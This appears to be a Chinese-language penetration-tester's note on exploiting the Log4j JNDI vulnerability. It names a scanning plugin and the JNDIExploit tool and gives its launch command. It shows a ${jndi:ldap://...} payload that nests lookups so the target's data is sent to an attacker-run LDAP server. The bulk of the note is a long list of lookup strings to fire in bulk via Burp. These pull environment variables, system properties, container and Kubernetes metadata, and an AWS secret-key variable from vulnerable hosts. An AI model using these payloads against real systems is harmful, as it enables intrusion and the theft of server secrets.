注:如何检测目标是否存在Log4j就不多赘述了,最方便的方法还是BP装上插件配合Ceye,效率高误报率低。
插件地址:https://github.com/pmiaowu/log4j2Scan
当发现一个目标存在漏洞后,能看到Ceye上的记录,但是使用rmi和ldap始终拿不到shell,也执行不了命令,此刻可能就需要收集一下目标系统信息了,为了方便更快的实时查看信息,时常需要自己手动起一个ldap或者rmi服务,不再依赖Ceye(那种慢腾腾加载数据的感觉,或者通过接口不停查看结果,麻烦。)
这里使用https://github.com/Mr-xn/JNDIExploit-1的文件
具体的使用参考github上的说明。当前测试使用如下命令:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xxx.xxx.xxx.xxx -l 1389 -p 8080启动后,通过burp的Repeater功能重复发送如下数据即可。
${jndi:ldap://xxx.xxx.xxx.xxx:1389/${log4j:configParentLocation}}看到的效果如下
常用到的收集信息方法:
${log4j:configParentLocation} #获取log4j的配置文件父目录
${log4j:configLocation} #获取log4j配置文件名称(通过文件判断是log4j还是log4j2,漏洞版本Log4j<=2.15.0-rc1,并非所有log4j都有漏洞)
${hostName} #获取主机名
${date:MM-dd-yyyy} #显示当前服务器时间
${java:os} #获取linux系统信息
${java:version} #获取目标机器的java版本(JDK1.8 191起默认不支持RMI和LDAP协议从远程加载类)
${java:runtime} #获取java运行时环境版本信息
${java:vm} #获取虚拟机信息
${java:hw} #获取硬件信息
${java:locale} #获取语言环境信息
${env:CLASSPATH} #获取java环境变量信息
其他更多信息可以丢Burp里一次性跑完,部分无返回:
${ctx:loginId}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:A8_HOME}
${env:A8_ROOT_BIN}
${env:ALLUSERSPROFILE}
${env:APPDATA}
${env:AWS_SECRET_ACCESS_KE}
${env:CATALINA_BASE}
${env:CATALINA_HOME}
${env:CATALINA_OPTS}
${env:CATALINA_TMPDIR}
${env:CLASSPATH}
${env:CLIENTNAME}
${env:COMPUTERNAME}
${env:ComSpec}
${env:CommonProgramFiles}
${env:CommonProgramFiles(x86)}
${env:CommonProgramW6432}
${env:FP_NO_HOST_CHECK}
${env:HISTORY_FILE}
${env:HISTSIZE}
${env:HISTTIMEFORMAT}
${env:HOME}
${env:HOMEDRIVE}
${env:HOMEPATH}
${env:IP_CONNECTION}
${env:JAVA_HOME}
${env:JDK_JAVA_OPTIONS}
${env:JRE_HOME}
${env:Java_Home}
${env:LANG}
${env:LESSOPEN}
${env:LOCALAPPDATA}
${env:LOCAL_IP}
${env:LOGNAME}
${env:LOGONSERVER}
${env:MAIL}
${env:NUMBER_OF_PROCESSORS}
${env:OS}
${env:PATH}
${env:PATHEXT}
${env:PROCESSOR_ARCHITECTURE}
${env:PROCESSOR_IDENTIFIER}
${env:PROCESSOR_LEVEL}
${env:PROCESSOR_REVISION}
${env:PROMPT}
${env:PROMPT_COMMAND}
${env:PSModulePath}
${env:PUBLIC}
${env:PWD}
${env:Path}
${env:ProgramData}
${env:ProgramFiles}
${env:ProgramFiles(x86)}
${env:ProgramW6432}
${env:QT_GRAPHICSSYSTEM}
${env:QT_GRAPHICSSYSTEM_CHECKED}
${env:SESSIONNAME}
${env:SHELL}
${env:SHLVL}
${env:SSH_ASKPASS}
${env:SSH_CLIENT}
${env:SSH_CONNECTION}
${env:SystemDrive}
${env:SystemRoot}
${env:TEMP}
${env:TMP}
${env:ThisExitCode}
${env:USER}
${env:USERDOMAIN}
${env:USERNAME}
${env:USERPROFILE}
${env:WORK_PATH}
${env:XDG_RUNTIME_DIR}
${env:XDG_SESSION_ID}
${env:_}
${env:user}
${env:windir}
${env:windows_tracing_flags}
${env:windows_tracing_logfile}
${event:Marker}
${filename}
${hostName}
${java:os}
${java:runtime}
${java:vm}
${jndi:logging/context-name}
${k8s:accountName}
${k8s:clusterName}
${k8s:containerId}
${k8s:containerName}
${k8s:host}
${k8s:imageId}
${k8s:imageName}
${k8s:labels.app}
${k8s:labels.podTemplateHash}
${k8s:masterUrl}
${k8s:namespaceId}
${k8s:namespaceName}
${k8s:podId}
${k8s:podIp}
${k8s:podName}
${log4j:configLocation}
${log4j:configParentLocation}
${main:0}
${main:1}
${main:2}
${main:3}
${main:4}
${main:bar}
${main:myString}
${map:type}
${marker}
${marker:name}
${mdc:UserId}
${name}
${spring:profiles.active[0}
${spring:spring.application.name}
${sys:PID}
${sys:awt.toolkit}
${sys:catalina.base}
${sys:catalina.home}
${sys:catalina.useNaming}
${sys:common.loader}
${sys:file.encoding}
${sys:file.encoding.pkg}
${sys:file.separator}
${sys:ignore.endorsed.dirs}
${sys:java.awt.graphicsenv}
${sys:java.awt.headless}
${sys:java.awt.printerjob}
${sys:java.class.path}
${sys:java.class.version}
${sys:java.endorsed.dirs}
${sys:java.ext.dirs}
${sys:java.home}
${sys:java.io.tmpdir}
${sys:java.library.path}
${sys:java.naming.factory.initial}
${sys:java.naming.factory.url.pkgs}
${sys:java.protocol.handler.pkgs}
${sys:java.runtime.name}
${sys:java.runtime.version}
${sys:java.security.egd}
${sys:java.specification.name}
${sys:java.specification.vendor}
${sys:java.specification.version}
${sys:java.util.concurrent.ForkJoinPool.common.parallelism}
${sys:java.util.concurrent.ForkJoinPool.common.threadFactory}
${sys:java.util.logging.config.file}
${sys:java.util.logging.manager}
${sys:java.vendor}
${sys:java.vendor.url}
${sys:java.vendor.url.bug}
${sys:java.version}
${sys:java.vm.info}
${sys:java.vm.name}
${sys:java.vm.specification.name}
${sys:java.vm.specification.vendor}
${sys:java.vm.specification.version}
${sys:java.vm.vendor}
${sys:java.vm.version}
${sys:jdk.tls.ephemeralDHKeySize}
${sys:line.separator}
${sys:localIp}
${sys:logPath}
${sys:org.apache.catalina.security.SecurityListener.UMASK}
${sys:os.arch}
${sys:os.name}
${sys:os.version}
${sys:package.access}
${sys:package.definition}
${sys:path.separator}
${sys:server.loader}
${sys:shared.loader}
${sys:spring.beaninfo.ignore}
${sys:spring.session.redis.namespace}
${sys:sun.arch.data.model}
${sys:sun.boot.class.path}
${sys:sun.boot.library.path}
${sys:sun.cpu.endian}
${sys:sun.cpu.isalist}
${sys:sun.io.unicode.encoding}
${sys:sun.java.command}
${sys:sun.java.launcher}
${sys:sun.jnu.encoding}
${sys:sun.management.compiler}
${sys:sun.nio.ch.bugLevel}
${sys:sun.os.patch.level}
${sys:sun.rmi.transport.tcp.responseTimeout}
${sys:tomcat.util.buf.StringCache.byte.enabled}
${sys:tomcat.util.scan.StandardJarScanFilter.jarsToScan}
${sys:tomcat.util.scan.StandardJarScanFilter.jarsToSkip}
${sys:user.country}
${sys:user.dir}
${sys:user.home}
${sys:user.language}
${sys:user.name}
${sys:user.timezone}
${web:rootDir}